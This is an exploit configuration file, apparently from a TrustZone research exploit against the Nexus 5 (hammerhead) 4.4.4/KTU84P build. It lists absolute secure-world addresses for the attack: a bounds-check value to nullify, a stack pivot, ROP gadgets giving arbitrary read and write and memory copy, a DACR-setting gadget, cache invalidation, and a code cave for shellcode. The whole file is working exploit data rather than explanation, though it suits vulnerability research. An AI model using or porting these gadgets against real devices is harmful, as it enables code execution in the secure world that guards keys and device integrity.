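# Symbols for the Nexus 5 (hammerhead) TrustZone image.
# Fingerprint: hammerhead:4.4.4/KTU84P
#
# Every value below is an absolute address inside the TZ image of exactly the
# build named above. None of them is derived at runtime, so this file must be
# re-generated (from the matching TZ image) before the exploit is pointed at
# any other firmware build - a stale address means writing or branching to an
# arbitrary location in secure-world memory, with no way to recover.
#
# Gadget addresses that end in "+1" carry the Thumb bit: the low bit of an ARM
# branch target selects Thumb state, and those gadgets are Thumb code. Gadgets
# without "+1" (SET_DACR, INVALIDATE_INSTRUCTION_CACHE, the pivot) are entered
# in ARM state.

# The DWORD that needs to be nullified in order to pass all bounds checks.
BOUNDS_CHECK_DWORD_ADDRESS = 0xFE828444

# The DWORD returned when querying fver_get_version with version code 0.
VERSION_CODE_0_DWORD_ADDRESS = 0xFE828994

# Address range (start inclusive, end exclusive) covered by the bounds checks.
BOUNDS_CHECKS_RANGE_START = 0xFE8304EC
BOUNDS_CHECKS_RANGE_END = 0xFE8306E8

# Address of the tzbsp_get_diag function pointer.
TZBSP_GET_DIAG_POINTER_ADDRESS = 0xFE82D504

# Address of the tzbsp_security_allows_memdump function pointer.
TZBSP_SECURITY_ALLOWS_MEMDUMP_POINTER_ADDRESS = 0xFE82D584

# Stack pivot: "MOV SP, R0; LDMFD SP!, {R4-R12, PC}" (ARM state).
MOV_SP_R0_LDMFD_R4_R12_PC = 0xFE856634

# "BX LR" gadget (Thumb).
BX_LR = 0xFE806604 + 1

# "LDR R0, [R0,R1]; BX LR" gadget (Thumb) - arbitrary read.
LDR_R0_R0_R1_BX_LR = 0xFE80A994 + 1

# "STR R0, [R1]; BX LR" gadget (Thumb) - arbitrary write.
STR_R0_R1_BX_LR = 0xFE852BB6 + 1

# "LDR R1, [R1]; STR R1, [R0]; BX LR" gadget (Thumb) - memory-to-memory copy.
LDR_R1_R1_STR_R1_R0_BX_LR = 0xFE8131B2 + 1

# Gadget used to set the DACR (ARM state).
SET_DACR = 0xFE80FCC4

# Instruction-cache invalidation gadget (ARM state).
INVALIDATE_INSTRUCTION_CACHE = 0xFE80F834

# Code cave into which the stub shellcode is written.
# An alternative cave at 0xFE807798 was recorded in an earlier revision of this
# file but is not used.
CODE_CAVE_ADDRESS = 0xFE81DE70

# Usable size of the cave: the bytes from CODE_CAVE_ADDRESS up to the next
# 0x1000-aligned boundary (0x190 bytes for the address above). Shellcode
# larger than this must not be written to the cave.
CODE_CAVE_SIZE = 0x1000 - (CODE_CAVE_ADDRESS & 0xFFF)

# The DWORD controlling whether log_print_format messages are actually written.
ENABLE_LOG_DWORD = 0xFE828A00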